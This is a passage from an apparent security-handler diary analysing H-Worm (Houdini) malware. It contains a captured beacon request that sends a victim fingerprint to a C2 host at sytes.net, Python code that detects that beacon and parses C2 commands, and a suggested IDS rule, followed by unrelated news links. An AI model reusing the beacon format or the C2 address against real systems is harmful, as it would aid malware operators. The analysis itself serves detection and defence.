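    "Accept-Language: fr-be\r\n"
    "User-Agent: 647B5904<|>PLAYBOX1<|>Xavier<|>Microsoft Windows XP Professional<|>plus<|>nan-av<|>false - 15/02/2019\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Host: ghanaandco.sytes.net:3007\r\n"
    "Content-Length: 0\r\n"
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n\r\n"
)


def parse_request(raw):
    """Split a raw HTTP request into (method, path, headers) with lower-cased header names."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def hworm_beacon(raw):
    """Return the victim fingerprint if the request is an H-Worm beacon, else None.

    Signature: POST to /is-ready with an empty body and a User-Agent made of
    '<|>'-separated fields instead of a browser string.
    """
    method, path, headers = parse_request(raw)
    ua = headers.get("user-agent", "")
    if method != "POST" or path != "/is-ready" or SEP not in ua:
        return None
    if headers.get("content-length", "0") != "0":
        return None
    info = dict(zip(BEACON_FIELDS, ua.split(SEP)))
    info["c2"] = headers.get("host", "")
    return info


def parse_c2_reply(body):
    """Split a reply body the way the worm does: cmd(0) is the verb, the rest are arguments."""
    parts = body.strip().split(SEP)
    verb, args = parts[0], parts[1:]
    if verb not in KNOWN_COMMANDS:
        raise ValueError(f"unknown H-Worm command: {verb!r}")
    return verb, args


if __name__ == "__main__":
    print(hworm_beacon(SAMPLE_BEACON))
    print(parse_c2_reply("sleep<|>5000"))
```

The User-Agent is the cheapest place to catch this: no browser sends "<|>" in that header, so a proxy or IDS rule on that substring alone, before even looking at the path, is low-noise.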
While the delivery method has changed, the malicious code itself is not new: this is the good old H-Worm (Houdini) already documented in 2013[3]. Old stuff but still used in the wild!
[1] https://www.alexa.com/siteinfo/github.com
[2] https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/drivetype-property
[3] https://www.fireeye.com/blog/threat-research/2013/09/now-you-see-me-h-worm-by-houdini.html
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
Posted by InfoSec News on Feb 12
http://www.thedrive.com/the-war-zone/26458/the-u-s-armys-new-up-gunned-stryker-armored-vehicles-have-been-hacked
Posted by InfoSec News on Feb 12
Forwarded from: vvandal[at]well[dot]com
Posted by InfoSec News on Feb 12
https://www.zdnet.com/article/russia-to-disconnect-from-the-internet-as-part-of-a-planned-test/
Posted by InfoSec News on Feb 12
https://www.cnn.com/2019/02/08/politics/cia-fbi-scammer-william-webster/index.html
Posted by InfoSec News on Feb 12
https://www.csoonline.com/article/3075293/leadership-management/cybersecurity-recruitment-in-crisis.html